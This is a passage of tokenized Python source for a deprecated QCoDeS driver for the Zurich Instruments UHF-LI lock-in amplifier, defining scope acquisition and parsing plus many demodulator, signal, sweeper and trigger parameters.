hauling data from the scopeModule? scope.execute()<line_sep># Now perform actions that may produce data, e.g. running an AWG <for_stmt>action self._scopeactions<block_start>action()<block_end>starttime=time.time()<line_sep>timedout=<false><line_sep>progress=scope.progress()<while_stmt>progress<l>1<block_start>log.debug(f'Scope progress is {progress}')<line_sep>progress=scope.progress()<line_sep>time.sleep(0.1)# This while+sleep is how ZI engineers do it <if_stmt>(time.time()-starttime)<g>20<times>meas_time+1<block_start>timedout=<true><line_sep><break><block_end><block_end>metadata=scope.get("scopeModule/*")<line_sep>zi_error=bool(metadata['error'][0])<line_sep># Stop the scope from running params['scope_runstop'].set('stop')<if_stmt><not>(timedout<or>zi_error)<block_start>log.info('[+] ZI scope acquisition completed OK')<line_sep>rawdata=scope.read()<if_stmt>"error"<in>rawdata<block_start>zi_error=bool(rawdata["error"][0])<block_end>data=self._scopedataparser(rawdata self.instrument.device npts segs channels)<block_end><else_stmt><block_start>log.warning('[-] ZI scope acquisition attempt {} '<concat>'failed, Timeout: {}, Error: {}, '<concat>'retrying'.format(error_counter timedout zi_error))<line_sep>rawdata=<none><line_sep>data=(<none> <none>)<line_sep>error_counter<augadd>1<block_end><if_stmt>error_counter<ge>num_retries<block_start>log.error('[+] ZI scope acquisition failed, maximum number'<concat>'of retries performed. No data returned')<line_sep><raise>RuntimeError('[+] ZI scope acquisition failed, maximum number'<concat>'of retries performed. 
No data returned')<block_end><block_end><finally_stmt># cleanup and make ready for next scope acquisition <block_start>scope.finish()<block_end><block_end>t_stop=time.monotonic()<line_sep>log.info('scope get method returning after {} s'.format(t_stop-t_start))<line_sep><return>data<block_end>@staticmethod<def_stmt>_scopedataparser rawdata deviceID scopelength segments channels<block_start>""" Cast the scope return value dict into a tuple. Args: rawdata (dict): The return of scopeModule.read() deviceID (str): The device ID string of the instrument. scopelength (int): The length of each segment segments (int): The number of segments channels (tuple): Tuple of two bools controlling what data to return (True, False) will return data for channel 1 etc. Returns: tuple: A 2-tuple of either None or np.array with dimensions segments x scopelength. """<line_sep>data=rawdata[f'{deviceID}']['scopes']['0']['wave'][0][0]<if_stmt>channels[0]<block_start>ch1data=data['wave'][0].reshape(segments scopelength)<block_end><else_stmt><block_start>ch1data=<none><block_end><if_stmt>channels[1]<block_start>ch2data=data['wave'][1].reshape(segments scopelength)<block_end><else_stmt><block_start>ch2data=<none><block_end><return>(ch1data ch2data)<block_end><block_end><class_stmt>ZIUHFLI(Instrument)<block_start>""" QCoDeS driver for ZI UHF-LI. Currently implementing demodulator settings and the sweeper functionality. Requires ZI Lab One software to be installed on the computer running QCoDeS. Furthermore, the Data Server and Web Server must be running and a connection between the two must be made. TODOs: * Add zoom-FFT """<line_sep>@deprecate(reason="There is a new UHFLI driver from Zurich Instruments" alternative="instrument_drivers.zurich_instruments.uhfli.UHFLI")<def_stmt>__init__ self name:str device_ID:str **kwargs<arrow><none><block_start>""" Create an instance of the instrument. 
Args: name (str): The internal QCoDeS name of the instrument device_ID (str): The device name as listed in the web server. """<line_sep>super().__init__(name **kwargs)<line_sep>self.api_level=5<line_sep>zisession=zhinst.utils.create_api_session(device_ID self.api_level)<line_sep>(self.daq self.device self.props)=zisession<line_sep>self.daq.setDebugLevel(3)<line_sep># create (instantiate) an instance of each module we will use self.sweeper=self.daq.sweep()<line_sep>self.sweeper.set('sweep/device' self.device)<line_sep>self.scope=self.daq.scopeModule()<line_sep>self.scope.subscribe(f'/{self.device}/scopes/0/wave')<line_sep>######################################## # INSTRUMENT PARAMETERS ######################################## # Oscillators number_of_oscillators=8<if>'MF'<in>self.props['options']<else>2<for_stmt>oscs range(1 number_of_oscillators+1)<block_start>self.add_parameter(f'oscillator{oscs}_freq' label=f'Frequency of oscillator {oscs}' unit='Hz' set_cmd=partial(self._setter 'oscs' oscs-1 1 'freq') get_cmd=partial(self._getter 'oscs' oscs-1 1 'freq') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter(f'demod{oscs}_oscillator' label=f'Selected oscillator {oscs}' docstring="Connects the demodulator with the "<concat>"supplied oscillator." 
get_cmd=partial(self._getter 'demods' oscs-1 0 'oscselect') set_cmd=partial(self._setter 'demods' oscs-1 0 'oscselect') val_mapping={i+1:i<for>i range(number_of_oscillators)})<block_end>######################################## # DEMODULATOR PARAMETERS <for_stmt>demod range(1 9)<block_start>self.add_parameter(f'demod{demod}_order' label='Filter order' get_cmd=partial(self._getter 'demods' demod-1 0 'order') set_cmd=partial(self._setter 'demods' demod-1 0 'order') vals=vals.Ints(1 8))<line_sep>self.add_parameter(f'demod{demod}_harmonic' label=('Reference frequency multiplication'+' factor') get_cmd=partial(self._getter 'demods' demod-1 0 'harmonic') set_cmd=partial(self._setter 'demods' demod-1 0 'harmonic') vals=vals.Ints(1 999))<line_sep>self.add_parameter(f'demod{demod}_timeconstant' label='Filter time constant' get_cmd=partial(self._getter 'demods' demod-1 1 'timeconstant') set_cmd=partial(self._setter 'demods' demod-1 1 'timeconstant') unit='s')<line_sep>self.add_parameter(f'demod{demod}_samplerate' label='Sample rate' get_cmd=partial(self._getter 'demods' demod-1 1 'rate') set_cmd=partial(self._setter 'demods' demod-1 1 'rate') unit='Sa/s' docstring=""" Note: the value inserted by the user may be approximated to the nearest value supported by the instrument. 
""")<line_sep>self.add_parameter(f'demod{demod}_phaseshift' label='Phase shift' unit='degrees' get_cmd=partial(self._getter 'demods' demod-1 1 'phaseshift') set_cmd=partial(self._setter 'demods' demod-1 1 'phaseshift'))<line_sep># val_mapping for the demodX_signalin parameter dmsigins={'Sig In 1':0 'Sig In 2':1 'Trigger 1':2 'Trigger 2':3 'Aux Out 1':4 'Aux Out 2':5 'Aux Out 3':6 'Aux Out 4':7 'Aux In 1':8 'Aux In 2':9 'Phi Demod 4':10 'Phi Demod 8':11}<line_sep>self.add_parameter(f'demod{demod}_signalin' label='Signal input' get_cmd=partial(self._getter 'demods' demod-1 0 'adcselect') set_cmd=partial(self._setter 'demods' demod-1 0 'adcselect') val_mapping=dmsigins vals=vals.Enum(*list(dmsigins.keys())))<line_sep>self.add_parameter(f'demod{demod}_sinc' label='Sinc filter' get_cmd=partial(self._getter 'demods' demod-1 0 'sinc') set_cmd=partial(self._setter 'demods' demod-1 0 'sinc') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'demod{demod}_streaming' label='Data streaming' get_cmd=partial(self._getter 'demods' demod-1 0 'enable') set_cmd=partial(self._setter 'demods' demod-1 0 'enable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>dmtrigs={'Continuous':0 'Trigger in 3 Rise':1 'Trigger in 3 Fall':2 'Trigger in 3 Both':3 'Trigger in 3 High':32 'Trigger in 3 Low':16 'Trigger in 4 Rise':4 'Trigger in 4 Fall':8 'Trigger in 4 Both':12 'Trigger in 4 High':128 'Trigger in 4 Low':64 'Trigger in 3|4 Rise':5 'Trigger in 3|4 Fall':10 'Trigger in 3|4 Both':15 'Trigger in 3|4 High':160 'Trigger in 3|4 Low':80}<line_sep>self.add_parameter(f'demod{demod}_trigger' label='Trigger' get_cmd=partial(self._getter 'demods' demod-1 0 'trigger') set_cmd=partial(self._setter 'demods' demod-1 0 'trigger') val_mapping=dmtrigs vals=vals.Enum(*list(dmtrigs.keys())))<line_sep>self.add_parameter(f'demod{demod}_sample' label='Demod sample' get_cmd=partial(self._getter 'demods' demod-1 2 'sample') 
snapshot_value=<false>)<for_stmt>demod_param ['x' 'y' 'R' 'phi']<block_start><if_stmt>demod_param<in>('x' 'y' 'R')<block_start>unit='V'<block_end><else_stmt><block_start>unit='deg'<block_end>self.add_parameter(f'demod{demod}_{demod_param}' label=f'Demod {demod} {demod_param}' get_cmd=partial(self._get_demod_sample demod-1 demod_param) snapshot_value=<false> unit=unit)<block_end><block_end>######################################## # SIGNAL INPUTS <for_stmt>sigin range(1 3)<block_start>self.add_parameter(f'signal_input{sigin}_range' label='Input range' set_cmd=partial(self._setter 'sigins' sigin-1 1 'range') get_cmd=partial(self._getter 'sigins' sigin-1 1 'range') unit='V')<line_sep>self.add_parameter(f'signal_input{sigin}_scaling' label='Input scaling' set_cmd=partial(self._setter 'sigins' sigin-1 1 'scaling') get_cmd=partial(self._getter 'sigins' sigin-1 1 'scaling') )<line_sep>self.add_parameter(f'signal_input{sigin}_AC' label='AC coupling' set_cmd=partial(self._setter 'sigins' sigin-1 0 'ac') get_cmd=partial(self._getter 'sigins' sigin-1 0 'ac') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_input{sigin}_impedance' label='Input impedance' set_cmd=partial(self._setter 'sigins' sigin-1 0 'imp50') get_cmd=partial(self._getter 'sigins' sigin-1 0 'imp50') val_mapping={50:1 1000:0} vals=vals.Enum(50 1000))<line_sep>sigindiffs={'Off':0 'Inverted':1 'Input 1 - Input 2':2 'Input 2 - Input 1':3}<line_sep>self.add_parameter(f'signal_input{sigin}_diff' label='Input signal subtraction' set_cmd=partial(self._setter 'sigins' sigin-1 0 'diff') get_cmd=partial(self._getter 'sigins' sigin-1 0 'diff') val_mapping=sigindiffs vals=vals.Enum(*list(sigindiffs.keys())))<block_end>######################################## # SIGNAL OUTPUTS outputamps={1:'amplitudes/3' 2:'amplitudes/7'}<line_sep>outputampenable={1:'enables/3' 2:'enables/7'}<for_stmt>sigout range(1 3)<block_start>self.add_parameter(f'signal_output{sigout}_on' label='Turn signal 
output on and off.' set_cmd=partial(self._sigout_setter sigout-1 0 'on') get_cmd=partial(self._sigout_getter sigout-1 0 'on') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_output{sigout}_imp50' label='Switch to turn on 50 Ohm impedance' set_cmd=partial(self._sigout_setter sigout-1 0 'imp50') get_cmd=partial(self._sigout_getter sigout-1 0 'imp50') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_output{sigout}_ampdef' get_cmd=<none> set_cmd=<none> initial_value='Vpk' label="Signal output amplitude's definition" unit='' vals=vals.Enum('Vpk' 'Vrms' 'dBm'))<line_sep>self.add_parameter(f'signal_output{sigout}_range' label='Signal output range' set_cmd=partial(self._sigout_setter sigout-1 1 'range') get_cmd=partial(self._sigout_getter sigout-1 1 'range') vals=vals.Enum(0.075 0.15 0.75 1.5))<line_sep>self.add_parameter(f'signal_output{sigout}_offset' label='Signal output offset' set_cmd=partial(self._sigout_setter sigout-1 1 'offset') get_cmd=partial(self._sigout_getter sigout-1 1 'offset') vals=vals.Numbers(-1.5 1.5) unit='V')<line_sep>self.add_parameter(f'signal_output{sigout}_autorange' label='Enable signal output range.' set_cmd=partial(self._sigout_setter sigout-1 0 'autorange') get_cmd=partial(self._sigout_getter sigout-1 0 'autorange') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<if_stmt>'MF'<in>self.props['options']<block_start><for_stmt>modeout range(1 9)<block_start>self.add_parameter(f'signal_output{sigout}_amplitude{modeout}' label='Signal output amplitude' set_cmd=partial(self._sigout_setter sigout-1 1 'amplitudes' output_mode=modeout-1) get_cmd=partial(self._sigout_getter sigout-1 1 'amplitudes' output_mode=modeout-1) docstring="Set the signal output amplitude. 
The actual "<concat>"unit and representation is defined by "<concat>"signal_output{}_ampdef "<concat>"parameter".format(sigout))<line_sep>self.add_parameter(f'signal_output{sigout}_enable{modeout}' label="Output signal enabled/disabled." set_cmd=partial(self._sigout_setter sigout-1 0 'enables' output_mode=modeout-1) get_cmd=partial(self._sigout_getter sigout-1 0 'enables' output_mode=modeout-1) val_mapping=create_on_off_val_mapping() docstring="Enabling/Disabling the Signal Output. "<concat>"Corresponds to the blue LED indicator on "<concat>"the instrument front panel.")<block_end><block_end><else_stmt><block_start>self.add_parameter(f'signal_output{sigout}_enable' label="Output signal enabled/disabled." set_cmd=partial(self._sigout_setter sigout-1 0 outputampenable[sigout]) get_cmd=partial(self._sigout_getter sigout-1 0 outputampenable[sigout]) val_mapping=create_on_off_val_mapping() docstring="Enabling/Disabling the Signal Output. "<concat>"Corresponds to the blue LED indicator on "<concat>"the instrument front panel.")<line_sep>self.add_parameter(f'signal_output{sigout}_amplitude' label='Signal output amplitude' set_cmd=partial(self._sigout_setter sigout-1 1 outputamps[sigout]) get_cmd=partial(self._sigout_getter sigout-1 1 outputamps[sigout]) docstring="Set the signal output amplitude. 
The actual unit"<concat>" and representation is defined by "<concat>"signal_output{}_ampdef parameter".format(sigout))<block_end><block_end>auxoutputchannels=ChannelList(self "AUXOutputChannels" AUXOutputChannel snapshotable=<false>)<for_stmt>auxchannum range(1 5)<block_start>name=f'aux_out{auxchannum}'<line_sep>auxchannel=AUXOutputChannel(self name auxchannum)<line_sep>auxoutputchannels.append(auxchannel)<line_sep>self.add_submodule(name auxchannel)<block_end>auxoutputchannels.lock()<line_sep>self.add_submodule('aux_out_channels' auxoutputchannels)<line_sep>######################################## # SWEEPER PARAMETERS self.add_parameter('sweeper_BWmode' label='Sweeper bandwidth control mode' set_cmd=partial(self._sweep_setter 'sweep/bandwidthcontrol') get_cmd=partial(self._sweep_getter 'sweep/bandwidthcontrol') val_mapping={'auto':2 'fixed':1 'current':0} docstring=""" For each sweep point, the demodulator filter bandwidth (time constant) may be either set automatically, be the current demodulator bandwidth or be a fixed number; the sweeper_BW parameter. """)<line_sep>self.add_parameter('sweeper_BW' label='Fixed bandwidth sweeper bandwidth (NEP)' set_cmd=partial(self._sweep_setter 'sweep/bandwidth') get_cmd=partial(self._sweep_getter 'sweep/bandwidth') docstring=""" This is the NEP bandwidth used by the sweeper if sweeper_BWmode is set to 'fixed'. If sweeper_BWmode is either 'auto' or 'current', this value is ignored. 
""")<line_sep>self.add_parameter('sweeper_start' label='Start value of the sweep' set_cmd=partial(self._sweep_setter 'sweep/start') get_cmd=partial(self._sweep_getter 'sweep/start') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter('sweeper_stop' label='Stop value of the sweep' set_cmd=partial(self._sweep_setter 'sweep/stop') get_cmd=partial(self._sweep_getter 'sweep/stop') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter('sweeper_samplecount' label='Length of the sweep (pts)' set_cmd=partial(self._sweep_setter 'sweep/samplecount') get_cmd=partial(self._sweep_getter 'sweep/samplecount') vals=vals.Ints(0 100000))<line_sep># val_mapping for sweeper_param parameter sweepparams={'Aux Out 1 Offset':'auxouts/0/offset' 'Aux Out 2 Offset':'auxouts/1/offset' 'Aux Out 3 Offset':'auxouts/2/offset' 'Aux Out 4 Offset':'auxouts/3/offset' 'Demod 1 Phase Shift':'demods/0/phaseshift' 'Demod 2 Phase Shift':'demods/1/phaseshift' 'Demod 3 Phase Shift':'demods/2/phaseshift' 'Demod 4 Phase Shift':'demods/3/phaseshift' 'Demod 5 Phase Shift':'demods/4/phaseshift' 'Demod 6 Phase Shift':'demods/5/phaseshift' 'Demod 7 Phase Shift':'demods/6/phaseshift' 'Demod 8 Phase Shift':'demods/7/phaseshift' 'Osc 1 Frequency':'oscs/0/freq' 'Osc 2 Frequency':'oscs/1/freq' 'Output 1 Amplitude 4':'sigouts/0/amplitudes/3' 'Output 1 Offset':'sigouts/0/offset' 'Output 2 Amplitude 8':'sigouts/1/amplitudes/7' 'Output 2 Offset':'sigouts/1/offset'}<line_sep>self.add_parameter('sweeper_param' label='Parameter to sweep (sweep x-axis)' set_cmd=partial(self._sweep_setter 'sweep/gridnode') val_mapping=sweepparams get_cmd=partial(self._sweep_getter 'sweep/gridnode') vals=vals.Enum(*list(sweepparams.keys())))<line_sep># val_mapping for sweeper_units parameter sweepunits={'Aux Out 1 Offset':'V' 'Aux Out 2 Offset':'V' 'Aux Out 3 Offset':'V' 'Aux Out 4 Offset':'V' 'Demod 1 Phase Shift':'degrees' 'Demod 2 Phase Shift':'degrees' 'Demod 3 Phase Shift':'degrees' 'Demod 4 Phase Shift':'degrees' 'Demod 5 Phase 
Shift':'degrees' 'Demod 6 Phase Shift':'degrees' 'Demod 7 Phase Shift':'degrees' 'Demod 8 Phase Shift':'degrees' 'Osc 1 Frequency':'Hz' 'Osc 2 Frequency':'Hz' 'Output 1 Amplitude 4':'V' 'Output 1 Offset':'V' 'Output 2 Amplitude 8':'V' 'Output 2 Offset':'V'}<line_sep>self.add_parameter('sweeper_units' label='Units of sweep x-axis' get_cmd=self.sweeper_param.get get_parser=<lambda>x:sweepunits[x])<line_sep># val_mapping for sweeper_mode parameter sweepmodes={'Sequential':0 'Binary':1 'Biderectional':2 'Reverse':3}<line_sep>self.add_parameter('sweeper_mode' label='Sweep mode' set_cmd=partial(self._sweep_setter 'sweep/scan') get_cmd=partial(self._sweep_getter 'sweep/scan') val_mapping=sweepmodes vals=vals.Enum(*list(sweepmodes)))<line_sep>self.add_parameter('sweeper_order' label='Sweeper filter order' set_cmd=partial(self._sweep_setter 'sweep/order') get_cmd=partial(self._sweep_getter 'sweep/order') vals=vals.Ints(1 8) docstring=""" This value is invoked only when the sweeper_BWmode is set to 'fixed'. """)<line_sep>self.add_parameter('sweeper_settlingtime' label=('Minimal settling time for the '+'sweeper') set_cmd=partial(self._sweep_setter 'sweep/settling/time') get_cmd=partial(self._sweep_getter 'sweep/settling/time') vals=vals.Numbers(0) unit='s' docstring=""" This is the minimal waiting time at each point during a sweep before the data acquisition starts. Note that the filter settings may result in a longer actual waiting/settling time. """)<line_sep>self.add_parameter('sweeper_inaccuracy' label='Demodulator filter settling inaccuracy' set_cmd=partial(self._sweep_setter 'sweep/settling/inaccuracy') docstring=""" Demodulator filter settling inaccuracy defining the wait time between a sweep parameter change and recording of the next sweep point. The settling time is calculated as the time required to attain the specified remaining proportion [1e-13, 0.1] of an incoming step function. 
Typical inaccuracy values: 10m for highest sweep speed for large signals, 100u for precise amplitude measurements, 100n for precise noise measurements. Depending on the order of the demodulator filter the settling inaccuracy will define the number of filter time constants the sweeper has to wait. The maximum between this value and the settling time is taken as wait time until the next sweep point is recorded. """)<line_sep>self.add_parameter('sweeper_settlingtc' label='Sweep filter settling time' get_cmd=partial(self._sweep_getter 'sweep/settling/tc') unit='' docstring="""This settling time is in units of the filter time constant.""")<line_sep>self.add_parameter('sweeper_averaging_samples' label=('Minimal no. of samples to average at '+'each sweep point') set_cmd=partial(self._sweep_setter 'sweep/averaging/sample') get_cmd=partial(self._sweep_getter 'sweep/averaging/sample') vals=vals.Ints(1) docstring=""" The actual number of samples is the maximum of this value and the sweeper_averaging_time times the relevant sample rate. 
""")<line_sep>self.add_parameter('sweeper_averaging_time' label=('Minimal averaging time') set_cmd=partial(self._sweep_setter 'sweep/averaging/tc') get_cmd=partial(self._sweep_getter 'sweep/averaging/tc') unit='s' docstring=""" The actual number of samples is the maximum of this value times the relevant sample rate and the sweeper_averaging_samples.""")<line_sep>self.add_parameter('sweeper_xmapping' label='Sweeper x mapping' set_cmd=partial(self._sweep_setter 'sweep/xmapping') get_cmd=partial(self._sweep_getter 'sweep/xmapping') val_mapping={'lin':0 'log':1})<line_sep>self.add_parameter('sweeper_sweeptime' label='Expected sweep time' unit='s' get_cmd=self._get_sweep_time)<line_sep>self.add_parameter('sweeper_timeout' label='Sweep timeout' unit='s' initial_value=600 get_cmd=<none> set_cmd=<none>)<line_sep>######################################## # THE SWEEP ITSELF self.add_parameter('Sweep' parameter_class=Sweep )<line_sep># A "manual" parameter: a list of the signals for the sweeper # to subscribe to self._sweeper_signals=[]# type: List[str] # This is the dictionary keeping track of the sweeper settings # These are the default settings self._sweepdict={'start':1e6 'stop':10e6 'samplecount':25 'bandwidthcontrol':1 # fixed mode 'bandwidth':50 'gridnode':'oscs/0/freq' 'scan':0 # sequential scan 'order':1 'settling/time':1e-6 'settling/inaccuracy':10e-3 'averaging/sample':25 'averaging/tc':100e-3 'xmapping':0 # linear }<line_sep># Set up the sweeper with the above settings self.Sweep.build_sweep()<line_sep>######################################## # SCOPE PARAMETERS # default parameters: # This parameter corresponds to the Run/Stop button in the GUI self.add_parameter('scope_runstop' label='Scope run state' set_cmd=partial(self._setter 'scopes' 0 0 'enable') get_cmd=partial(self._getter 'scopes' 0 0 'enable') val_mapping={'run':1 'stop':0} vals=vals.Enum('run' 'stop') docstring=('This parameter corresponds to the '<concat>'run/stop button in the 
GUI.'))<line_sep>self.add_parameter('scope_mode' label="Scope's mode: time or frequency domain." set_cmd=partial(self._scope_setter 1 0 'mode') get_cmd=partial(self._scope_getter 'mode') val_mapping={'Time Domain':1 'Freq Domain FFT':3} vals=vals.Enum('Time Domain' 'Freq Domain FFT'))<line_sep># 1: Channel 1 on, Channel 2 off. # 2: Channel 1 off, Channel 2 on, # 3: Channel 1 on, Channel 2 on. self.add_parameter('scope_channels' label='Recorded scope channels' set_cmd=partial(self._scope_setter 0 0 'channel') get_cmd=partial(self._getter 'scopes' 0 0 'channel') vals=vals.Enum(1 2 3))<line_sep>self._samplingrate_codes={'1.80 GHz':0 '900 MHz':1 '450 MHz':2 '225 MHz':3 '113 MHz':4 '56.2 MHz':5 '28.1 MHz':6 '14.0 MHz':7 '7.03 MHz':8 '3.50 MHz':9 '1.75 MHz':10 '880 kHz':11 '440 kHz':12 '220 kHz':13 '110 kHz':14 '54.9 kHz':15 '27.5 kHz':16}<line_sep>self.add_parameter('scope_samplingrate' label="Scope's sampling rate" set_cmd=partial(self._scope_setter 0 0 'time') get_cmd=partial(self._getter 'scopes' 0 0 'time') val_mapping=self._samplingrate_codes vals=vals.Enum(*list(self._samplingrate_codes.keys())))<line_sep>self.add_parameter("scope_samplingrate_float" label="Scope's sampling rate as float" set_cmd=self._set_samplingrate_as_float unit="Hz" get_cmd=self._get_samplingrate_as_float vals=vals.Enum(*(1.8e9/2<power>v<for>v self._samplingrate_codes.values())) docstring=""" A numeric representation of the scope's samplingrate parameter. 
Sets and gets the sampling rate by using the scope_samplingrate parameter.""")<line_sep>self.add_parameter('scope_length' label="Length of scope trace (pts)" set_cmd=partial(self._scope_setter 0 1 'length') get_cmd=partial(self._getter 'scopes' 0 1 'length') vals=vals.Numbers(4096 128000000) get_parser=int)<line_sep>self.add_parameter('scope_duration' label="Scope trace duration" set_cmd=partial(self._scope_setter 0 0 'duration') get_cmd=partial(self._scope_getter 'duration') vals=vals.Numbers(2.27e-6 4.660e3) unit='s')<line_sep># Map the possible input sources to LabOne's IDs. # The IDs can be seen in log file of LabOne UI inputselect={'Signal Input 1':0 'Signal Input 2':1 'Trig Input 1':2 'Trig Input 2':3 'Aux Output 1':4 'Aux Output 2':5 'Aux Output 3':6 'Aux Output 4':7 'Aux In 1 Ch 1':8 'Aux In 1 Ch 2':9 'Osc phi Demod 4':10 'Osc phi Demod 8':11 'AU Cartesian 1':112 'AU Cartesian 2':113 'AU Polar 1':128 'AU Polar 2':129 }<line_sep># Add all 8 demodulators and their respective parameters # to inputselect as well. # Numbers correspond to LabOne IDs, taken from UI log. 
<for_stmt>demod range(1 9)<block_start>inputselect[f'Demod {demod} X']=15+demod<line_sep>inputselect[f'Demod {demod} Y']=31+demod<line_sep>inputselect[f'Demod {demod} R']=47+demod<line_sep>inputselect[f'Demod {demod} Phase']=63+demod<block_end><for_stmt>channel range(1 3)<block_start>self.add_parameter(f"scope_channel{channel}_input" label=(f"Scope's channel {channel}"+" input source") set_cmd=partial(self._scope_setter 0 0 (f"channels/{channel-1}/"+"inputselect")) get_cmd=partial(self._getter "scopes" 0 0 (f"channels/{channel-1}/"+"inputselect") ) val_mapping=inputselect vals=vals.Enum(*list(inputselect.keys())) )<block_end>self.add_parameter('scope_average_weight' label="Scope Averages" set_cmd=partial(self._scope_setter 1 0 'averager/weight') get_cmd=partial(self._scope_getter 'averager/weight') vals=vals.Numbers(min_value=1))<line_sep>self.add_parameter('scope_trig_enable' label="Enable triggering for scope readout" set_cmd=partial(self._setter 'scopes' 0 0 'trigenable') get_cmd=partial(self._getter 'scopes' 0 0 'trigenable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_trig_signal' label="Trigger signal source" set_cmd=partial(self._setter 'scopes' 0 0 'trigchannel') get_cmd=partial(self._getter 'scopes' 0 0 'trigchannel') val_mapping=inputselect vals=vals.Enum(*list(inputselect.keys())))<line_sep>slopes={'None':0 'Rise':1 'Fall':2 'Both':3}<line_sep>self.add_parameter('scope_trig_slope' label="Scope's triggering slope" set_cmd=partial(self._setter 'scopes' 0 0 'trigslope') get_cmd=partial(self._getter 'scopes' 0 0 'trigslope') val_mapping=slopes vals=vals.Enum(*list(slopes.keys())))<line_sep># TODO: figure out how value/percent works for the trigger level self.add_parameter('scope_trig_level' label="Scope trigger level" set_cmd=partial(self._setter 'scopes' 0 1 'triglevel') get_cmd=partial(self._getter 'scopes' 0 1 'triglevel') vals=vals.Numbers())<line_sep>self.add_parameter('scope_trig_hystmode' label="Enable 
triggering for scope readout." set_cmd=partial(self._setter 'scopes' 0 0 'trighysteresis/mode') get_cmd=partial(self._getter 'scopes' 0 0 'trighysteresis/mode') val_mapping={'absolute':0 'relative':1} vals=vals.Enum('absolute' 'relative'))<line_sep>self.add_parameter('scope_trig_hystrelative' label="Trigger hysteresis, relative value in %" set_cmd=partial(self._setter 'scopes' 0 1 'trighysteresis/relative') get_cmd=partial(self._getter 'scopes' 0 1 'trighysteresis/relative') # val_mapping= lambda x: 0.01*x, vals=vals.Numbers(0))<line_sep>self.add_parameter('scope_trig_hystabsolute' label="Trigger hysteresis, absolute value" set_cmd=partial(self._setter 'scopes' 0 1 'trighysteresis/absolute') get_cmd=partial(self._getter 'scopes' 0 1 'trighysteresis/absolute') vals=vals.Numbers(0 20))<line_sep>triggates={'Trigger In 3 High':0 'Trigger In 3 Low':1 'Trigger In 4 High':2 'Trigger In 4 Low':3}<line_sep>self.add_parameter('scope_trig_gating_source' label='Scope trigger gating source' set_cmd=partial(self._setter 'scopes' 0 0 'triggate/inputselect') get_cmd=partial(self._getter 'scopes' 0 0 'triggate/inputselect') val_mapping=triggates vals=vals.Enum(*list(triggates.keys())))<line_sep>self.add_parameter('scope_trig_gating_enable' label='Scope trigger gating ON/OFF' set_cmd=partial(self._setter 'scopes' 0 0 'triggate/enable') get_cmd=partial(self._getter 'scopes' 0 0 'triggate/enable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_trig_holdoffmode' label="Scope trigger holdoff mode" set_cmd=partial(self._setter 'scopes' 0 0 'trigholdoffmode') get_cmd=partial(self._getter 'scopes' 0 0 'trigholdoffmode') val_mapping={'s':0 'events':1} vals=vals.Enum('s' 'events'))<line_sep>self.add_parameter('scope_trig_holdoffseconds' label='Scope trigger holdoff' set_cmd=partial(self._scope_setter 0 1 'trigholdoff') get_cmd=partial(self._getter 'scopes' 0 1 'trigholdoff') unit='s' vals=vals.Numbers(20e-6 
10))<line_sep>self.add_parameter('scope_trig_reference' label='Scope trigger reference' set_cmd=partial(self._scope_setter 0 1 'trigreference') get_cmd=partial(self._getter 'scopes' 0 1 'trigreference') vals=vals.Numbers(0 100))<line_sep># TODO: add validation. What's the minimal/maximal delay? self.add_parameter('scope_trig_delay' label='Scope trigger delay' set_cmd=partial(self._scope_setter 0 1 'trigdelay') get_cmd=partial(self._getter 'scopes' 0 1 'trigdelay') unit='s')<line_sep>self.add_parameter('scope_segments' label='Enable/disable segments' set_cmd=partial(self._scope_setter 0 0 'segments/enable') get_cmd=partial(self._getter 'scopes' 0 0 'segments/enable') val_mapping={'OFF':0 'ON':1} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_segments_count' label='No. of segments returned by scope' set_cmd=partial(self._setter 'scopes' 0 1 'segments/count') get_cmd=partial(self._getter 'scopes' 0 1 'segments/count') vals=vals.Ints(1 32768) get_parser=int)<line_sep>self.add_function('scope_reset_avg' call_cmd=partial(self.scope.set 'scopeModule/averager/restart' 1) )<line_sep>######################################## # THE SCOPE ITSELF self.add_parameter('Scope' parameter_class=Scope )<line_sep>######################################## # SYSTEM PARAMETERS self.add_parameter('external_clock_enabled' set_cmd=partial(self.daq.setInt f"/{self.device}/system/extclk") get_cmd=partial(self.daq.getInt f"/{self.device}/system/extclk") val_mapping=create_on_off_val_mapping() docstring="Set the clock source to external 10 MHz reference clock.")<line_sep>self.add_parameter('jumbo_frames_enabled' set_cmd=partial(self.daq.setInt f"/{self.device}/system/jumbo") get_cmd=partial(self.daq.getInt f"/{self.device}/system/jumbo") val_mapping=create_on_off_val_mapping() docstring="Enable jumbo frames on the TCP/IP interface")<block_end><def_stmt>snapshot_base self update:Optional[bool]=<true> params_to_skip_update:Optional[Sequence[str]]=<none><arrow>Dict[Any 
Any]<block_start>""" Override the base method to ignore 'sweeper_sweeptime' if no signals selected."""<line_sep>params_to_skip=[]<if_stmt><not>self._sweeper_signals<block_start>params_to_skip.append('sweeper_sweeptime')<block_end><if_stmt>params_to_skip_update<is><not><none><block_start>params_to_skip<augadd>list(params_to_skip_update)<block_end><return>super().snapshot_base(update=update params_to_skip_update=params_to_skip)<block_end><def_stmt>_setter self module number mode setting value<block_start>""" General function to set/send settings to the device. The module (e.g demodulator, input, output,..) number is counted in a zero indexed fashion. Args: module (str): The module (eg. demodulator, input, output, ..) to set. number (int): Module's index mode (int): Indicating whether we are asking for an int (0) or double (1) setting (str): The module's setting to set. value (int/double): The value to set. """<line_sep>setstr=f'/{self.device}/{module}/{number}/{setting}'<if_stmt>mode<eq>0<block_start>self.daq.setInt(setstr value)<block_end><if_stmt>mode<eq>1<block_start>self.daq.setDouble(setstr value)<block_end><block_end><def_stmt>_getter self module:str number:int mode:int setting:str<arrow>Union[float int str Dict[Any Any]]<block_start>""" General get function for 